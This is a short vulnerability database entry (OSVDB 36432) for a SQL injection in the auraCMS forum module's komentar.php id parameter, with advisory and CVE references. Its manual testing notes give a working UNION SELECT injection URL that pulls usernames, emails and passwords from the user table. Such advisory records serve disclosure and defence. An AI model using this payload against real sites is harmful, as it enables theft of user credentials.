auraCMS Modul Forum komentar.php id Variable SQL Injection

2007-08-05T00:00:00
ID OSVDB:36432
Type osvdb
Reporter k1tk4t(k1k4t@newhack.org)
Modified 2007-08-05T00:00:00

Description

Manual Testing Notes

http://[target]/AuraCMS/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,user,id,4,email,password%20from%20user/*

References:

Secunia Advisory ID:26332 ISS X-Force ID: 35814 Generic Exploit URL: http://milw0rm.com/exploits/4254 CVE-2007-4171 Bugtraq ID: 25202